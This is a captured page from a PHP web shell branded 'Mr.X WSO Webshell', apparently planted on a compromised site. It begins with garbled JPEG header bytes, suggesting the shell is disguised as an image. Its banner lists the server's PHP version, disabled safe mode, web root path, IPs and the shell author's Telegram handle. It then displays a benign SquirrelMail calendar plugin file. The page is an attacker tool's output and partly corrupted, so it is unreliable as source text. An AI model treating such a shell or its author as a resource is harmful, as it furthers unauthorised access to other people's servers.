����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 12:46:49 1999.30 GB Free: 72.08 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?php
/**
* Calendar plugin activation script
*
* @copyright 2002-2011 The SquirrelMail Project Team
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
* @version $Id: setup.php 14084 2011-01-06 02:44:03Z pdontthink $
* @package plugins
* @subpackage calendar
*/
/**
* Initialize the plugin
* @return void
*/
function squirrelmail_plugin_init_calendar() {
global $squirrelmail_plugin_hooks;
$squirrelmail_plugin_hooks['menuline']['calendar'] = 'calendar';
}
/**
* Adds Calendar link to upper menu
* @return void
*/
function calendar() {
displayInternalLink('plugins/calendar/calendar.php',_("Calendar"),'right');
echo " \n";
}
?>